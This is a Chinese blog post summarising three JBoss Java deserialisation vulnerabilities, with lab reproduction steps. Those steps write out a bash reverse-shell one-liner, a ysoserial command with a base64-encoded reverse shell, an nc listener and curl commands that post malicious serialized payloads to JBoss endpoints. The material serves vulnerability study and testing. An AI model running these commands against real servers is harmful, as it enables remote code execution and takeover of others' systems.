web服务器/中间件漏洞系列3:jboss漏洞汇总

最新推荐文章于 2024-07-30 11:32:04 发布
最新推荐文章于 2024-07-30 11:32:04 发布
阅读量1.6k 收藏 2
点赞数
分类专栏: web服务器/中间件漏洞整理分析 文章标签: 信息安全 web 渗透测试 jboss 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45590334/article/details/121625117
版权

在这里插入图片描述

JBOSSS简介: JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

一、CVE-2017-12149

1、漏洞简介

漏洞类型:java 反序列化

漏洞原理: 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

影响范围:5.x ,6.x

2、漏洞复现

  1. 搭建好环境后,访问 http://ip:8080/invoker/readonly,如果返回500界面说明存在漏洞。
    在这里插入图片描述

  2. 打开jboss漏洞利用工具(可在guithub上搜索相关漏洞编号自行下载)
    在这里插入图片描述3. 输入目标地址,可以先检测漏洞是否存在,存在后可以直接执行系统命令。在这里插入图片描述

  3. 执行系统命令,可以反弹shell,写入木马等。
    在这里插入图片描述

二、CVE-2017-7504

1、漏洞简介

漏洞类型: JMXInvokerServlet 反序列化漏洞

漏洞原理: JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响范围: Jboss 4.x

2、漏洞复现

  • 访问漏洞环境,进入漏洞点:jbossmq-httpil/HTTPServerILServlet,显示如下界面。
    在这里插入图片描述

  • 按照漏洞利用步骤进行漏洞利用:
    1) 生成class文件:javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
    2) 生成ser恶意序列化文件:java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.17.132/7777 0>&1"
    3) 攻击机监听端口:nc -lvvp 7777
    4) 执行攻击payload,反弹shell: sudo curl http://192.168.17.244:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

  • 反弹shell成功。
    在这里插入图片描述

三、 JMXInvokerServlet 反序列化漏洞

1、漏洞简介:

漏洞原理:
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。
影响范围:

  • JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
  • JBoss AS (Wildly) 6 and earlier
  • JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0
  • JBoss SOA Platform (SOA-P) 5.3.1
  • JBoss Data Grid (JDG) 6.5.0
  • JBoss BRMS (BRMS)6.1.0
  • JBoss BPMS (BPMS) 6.1.0
  • JBoss Data Virtualization (JDV) 6.1.0
  • JBoss Fuse Service Works (FSW) 6.0.0
  • JBoss Enterprise Web Server (EWS) 2.1,3.0
2、漏洞复现

1)访问目标站点的8080端口,是一个默认Jboss页面。
2)访问/invoker/JMXInvokerServlet,如果说存在文件下载,说明存在漏洞。
3)由于JBOSS是在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。
4)首先使用ysoserial(也可以使用JavaDeserH2HC)生成反序列化数据: java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xMjgvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser
5)使用nc监听端口 :nc -lvvp 7777
6)使用curl发送数据 : curl http://192.168.17.244:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
7)等待收到反弹shell即可(此处未收到,漏洞复现失败…一万个无语…)

W0ngk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jboss安全漏洞修补方法
03-01
帮助修补JBOSS安全漏洞,防止别人黑进你的服务器
JBoss中间件漏洞总结1
08-03
JBoss中间件是一款基于J2EE(Java 2 Platform, Enterprise Edition)的开源应用程序服务器,其核心服务专注于管理和运行EJB(Enterprise JavaBeans)容器和服务器JBoss支持EJB 1.1、EJB 2.0以及EJB 3.0规范,但不...
Jboss4.2之前版本修复安全漏洞
a_c_c_a的专栏
04-25 1258
jboss作为一个老古董,有些服务是已经部署了十年以上,后来漏洞不断出现,就要不断升级修复漏洞 jboss在4.0.5版本之前,会引入tomcat组件jbossWeb-tomcatxx.sar。但是在4.0.5之后,换成了jboss-web.deployer。 特别想吐槽的是,jboss4/5/6/7各版本之间差别很大,boss开发人员完全不考虑外场应用的部署情况,各版本jboss之间无法直接...
Jboss多个远程命令执行漏洞(CVE-2017-12149、CVE-2015-7501、CVE-2017-7504)
qq_68163788的博客
06-26 1178
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss漏洞
公众号shadow sock7
05-26 460
CVE-2017-12149 /invoker/JMXInvokerServlet 反序列化 In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for whi
JBOSS未授权漏洞总结
m0_64481831的博客
04-03 1282
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS未授权访问漏洞介绍漏洞原理JBOSS未授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
深入浅出带你学习JBoss中间件常见漏洞
qq_44005305的博客
01-02 2002
本文给大家带来的是JBOSS中间件漏洞的总结,详细讲解一下JBOSS中间件的常见漏洞以及利用方法,本文就着JBOSS中间件的特性来分析该中间件的常见漏洞利用方式,下面我们展开文章来讲。简单来说可以介绍为一个开源的符合J2EE规范的应用服务器,作为J2EE规范的补充,Jboss中引入了AOP框架,为普通Java类提供了J2EE服务,而无需遵循EJB规范。该中间件的特点如下:它将具有革命性的JMX微内核服务作为其总线结构;
JBOSS的一些漏洞
p656456564545的专栏
01-12 1995
http://olms.sinopec.com:80/invoker/JMXInvokerServlet http://edcard.sinopec.com:80/invoker/JMXInvokerServlet 还有一个就是未授权的访问
常见中间件漏洞总结PPT
01-25
常见的WebLogic漏洞包括弱口令、SSRF(服务器端请求伪造)、任意文件上传和反序列化漏洞。利用这些漏洞,攻击者可以上传恶意war包,执行任意代码等。这些漏洞在Oracle WebLogic Server的多个版本中存在,如**.*.*.*....
Web漏洞检测及修复方案.doc
05-17
Web 漏洞检测及修复方案 Web 漏洞检测及修复方案是指对 Web 应用程序的漏洞进行检测和修复,以确保 Web 应用程序的安全性。该方案涵盖了认证和授权类、命令执行类等多种类型的漏洞,旨在帮助开发者和安全专家快速...
web应用漏洞.docx
07-05
这些漏洞来自于多种 Web 应用程序,如 ColdFusion、BEESCMS、DedeCMS、Discuz、Drupal、ECShop、ElasticSearch、eWebeditor、FengCMS、FineCMS、Gitlab、Gogs、JBoss、Jenkins、Jolokia、Joomla 等。 一、远程代码...
jboss-web-2.1.0.GA.zip
06-20
jboss-web-2.1.0.GA.zip 绿色包
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 592
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
中间件安全:JBOSS 未授权访问漏洞.
最新发布
网络安全领域___专研者.
07-30 414
JBoss 是一个基于 J2EE 的开放源代码的 应用服务器JBoss 未授权访问漏洞允许攻击者在没有进行身份验证的情况下访问 JBoss 的管理控制台。通过该漏洞攻击者可以后台管理服务,甚至可以通过脚本命令执行系统命令,如反弹 shell、wget 写 webshell 文件等。
漏洞复现 :JBoss漏洞总结
qq_45751902的博客
10-31 1512
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
JBoss漏洞总结
qq1325928591的博客
12-28 4083
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w
JBoss web服务器漏洞复现
老北京砸酱锤的博客
06-22 974
漏洞主要是由于JBoss中 /jbossmq-httpil/HTTPServerILServlet路径对外开放,由于JBoss的jmx组件支持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制,导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时,导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞漏洞复现过程 1.拉取jboss(CVE-2017-7054)漏洞环境,装载并查看环境是否装在成功 浏览器访问http://localhost:8080.
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值